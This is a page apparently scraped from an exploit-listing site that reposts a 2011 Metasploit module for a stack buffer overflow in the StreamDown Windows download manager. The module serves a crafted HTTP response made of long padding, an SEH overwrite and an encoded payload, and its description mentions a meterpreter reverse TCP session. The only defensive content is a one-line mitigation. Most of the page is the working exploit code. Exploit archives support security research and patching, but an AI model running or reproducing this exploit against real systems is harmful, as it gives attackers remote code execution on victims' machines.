Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
StreamDown Buffer over flow universal exploit - exploit.company
header-logo
Suggest Exploit
vendor:
StreamDown
by:
Fady Mohamed Osman
N/A
CVSS
N/A
Buffer Overflow
119
CWE
Product Name: StreamDown
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2011

StreamDown Buffer over flow universal exploit

This is a universal exploit for the StreamDown software that exploits a buffer overflow vulnerability. It has been tested against Windows XP SP3 and Windows 7 SP1. It should be noted that the program will not crash in case of a meterpreter reverse TCP payload, but a session will be opened.

Mitigation:

Apply the latest patches and updates for StreamDown.
Source

Exploit-DB raw data:

##
# $Id: stream_down_BOF.rb 1 2011-12-18 $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking
	include Msf::Exploit::Remote::HttpServer
	
	def initialize
			super(
					'Name'           => 'StreamDown Buffer over flow universal exploit',
					'Version'        => '$Revision: 1 $',
					'Description'    => 'Stream Down Buffer Overflow universal exploit tested against win xp sp3 and win7 sp1. Also note that the program will not crash in case of meterpreter reverse tcp payload but a session will be opened',
					'Author'         => 'Fady Mohamed Osman',
					'References'	 => 
						[
								['URL', 'http://www.dark-masters.tk/']
						],
					'Privileged'     => false,
					'DefaultOptions' =>
						{
							'EXITFUNC' => 'seh',
							'InitialAutoRunScript' => 'migrate -f'
						},
					'Payload'        =>
						{
							'BadChars' => "\x00\xff\x0a"
						},
					'Platform'       => 'win',
					'Targets'        =>
						[
							[ 'Automatic',  { } ],
						],
					'DefaultTarget' => 0,
					'License'        => MSF_LICENSE
                )
	end
	def on_request_uri(cli,request)
		seh = 0x10019448
		nseh = "\xeb\x06\x90\x90"
		sploit = "A"*16388 + nseh + [seh].pack('V') + "\x90"*10 + payload.encoded 
		cli.put(sploit)
		close_client(cli)
	end
end

Navigation

Suggest Exploit

Services By CQR